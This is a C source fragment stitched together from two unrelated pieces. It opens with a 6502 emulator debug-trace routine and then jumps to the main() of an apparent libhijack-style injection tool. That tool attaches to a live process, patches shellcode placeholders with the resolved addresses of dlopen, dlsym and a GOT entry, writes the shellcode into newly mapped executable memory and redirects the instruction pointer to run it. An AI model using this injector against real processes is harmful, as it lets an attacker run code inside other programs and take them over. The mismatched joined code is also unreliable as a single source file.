void CSystem::DebugTrace(int address)
{
char message[1024+1];
int count=0;
sprintf(message,"%08x - DebugTrace(): ",gSystemCycleCount);
count=strlen(message);
if(address)
{
if(address==0xffff)
{
C6502_REGS regs;
char linetext[1024];
// Register dump
GetRegs(regs);
sprintf(linetext,"PC=$%04x SP=$%02x PS=0x%02x A=0x%02x X=0x%02x Y=0x%02x",regs.PC,regs.SP, regs.PS,regs.A,regs.X,regs.Y);
strcat(message,linetext);
count=strlen(message);
}
else
{
// The RAM address contents should be dumped to an open debug file in this function
do
{
message[count++]=Peek_RAM(address);
}
while(count<1024 && Peek_RAM(address++)!=0);
}
}
else
{
strcat(message,"CPU Breakpoint");
count=strlen(message);
}
message[count]=0;
// Callback to dump the message
if(mpDebugCallback)
{
(*mpDebugCallback)(mDebugCallbackObject,message);
}
}
int main(int argc, char *argv[])
{
HIJACK *hijack;
FUNC *funcs, *func;
unsigned long shellcode_addr, filename_addr, dlopen_addr, dlsym_addr, funcname_addr, pltgot_addr;
struct stat sb;
char *shellcode, *p1;
int fd;
struct user_regs_struct *regs, *backup;
if (argc != 5)
usage(argv[0]);
hijack = InitHijack();
ToggleFlag(hijack, F_DEBUG);
ToggleFlag(hijack, F_DEBUG_VERBOSE);
AssignPid(hijack, atoi(argv[1]));
if (Attach(hijack) != ERROR_NONE)
{
fprintf(stderr, "[-] Couldn't attach!\n");
exit(EXIT_FAILURE);
}
backup = GetRegs(hijack);
regs = malloc(sizeof(struct user_regs_struct));
stat(argv[2], &sb);
shellcode = malloc(sb.st_size);
fd = open(argv[2], O_RDONLY);
read(fd, shellcode, sb.st_size);
close(fd);
LocateAllFunctions(hijack);
funcs = FindFunctionInLibraryByName(hijack, "/lib/libdl.so.2", "dlopen");
if (!(funcs))
{
fprintf(stderr, "[-] Couldn't locate dlopen!\n");
exit(EXIT_FAILURE);
}
dlopen_addr = funcs->vaddr;
printf("dlopen_addr: 0x%08lx\n", dlopen_addr);
funcs = FindFunctionInLibraryByName(hijack, "/lib/libdl.so.2", "dlsym");
if (!(funcs))
{
fprintf(stderr, "[-] Couldn't locate dlsym!\n");
exit(EXIT_FAILURE);
}
dlsym_addr = funcs->vaddr;
printf("dlsym_addr: 0x%08lx\n", dlsym_addr);
memcpy(regs, backup, sizeof(struct user_regs_struct));
LocateSystemCall(hijack);
filename_addr = MapMemory(hijack, (unsigned long)NULL, 4096,PROT_READ | PROT_EXEC | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE);
memcpy(regs, backup, sizeof(struct user_regs_struct));
p1 = memmem(shellcode, sb.st_size, "\x22\x22\x22\x22", 4);
memcpy(p1, &filename_addr, 4);
funcname_addr = filename_addr + strlen(argv[3]) + 1;
shellcode_addr = funcname_addr + strlen(argv[4]) + 1;
printf("filename_addr: 0x%08lx\n", filename_addr);
printf("shellcode_addr: 0x%08lx\n", shellcode_addr);
printf("esp: 0x%08lx\n", regs->esp);
printf("eip: 0x%08lx\n", regs->eip);
p1 = memmem(shellcode, sb.st_size, "\x33\x33\x33\x33", 4);
memcpy(p1, &dlopen_addr, 4);
p1 = memmem(shellcode, sb.st_size, "\x44\x44\x44\x44", 4);
memcpy(p1, &funcname_addr, 4);
p1 = memmem(shellcode, sb.st_size, "\x55\x55\x55\x55", 4);
memcpy(p1, &dlsym_addr, 4);
funcs = FindAllFunctionsByName(hijack, argv[4], false);
for (func = funcs; func != NULL; func = func->next)
{
if (!(func->name))
continue;
pltgot_addr = FindFunctionInGot(hijack, hijack->pltgot, func->vaddr);
if (pltgot_addr > 0)
break;
}
printf("pltgot_addr: 0x%08lx\n", pltgot_addr);
p1 = memmem(shellcode, sb.st_size, "\x66\x66\x66\x66", 4);
memcpy(p1, &pltgot_addr, 4);
WriteData(hijack, filename_addr, (unsigned char *)argv[3], strlen(argv[3]));
WriteData(hijack, funcname_addr, (unsigned char *)argv[4], strlen(argv[4]));
WriteData(hijack, shellcode_addr, (unsigned char *)shellcode, sb.st_size);
regs->esp -= 4;
SetRegs(hijack, regs);
WriteData(hijack, regs->esp, &(regs->eip), 4);
regs->eip = shellcode_addr;
if (regs->orig_eax >= 0)
{
switch (regs->eax)
{
case -514: /* -ERESTARTNOHAND */
case -512: /* -ERESTARTSYS */
case -513: /* -ERESTARTNOINTR */
case -516: /* -ERESTART_RESTARTBLOCK */
regs->eip += 2;
break;
}
}
SetRegs(hijack, regs);
Detach(hijack);
return 0;
}
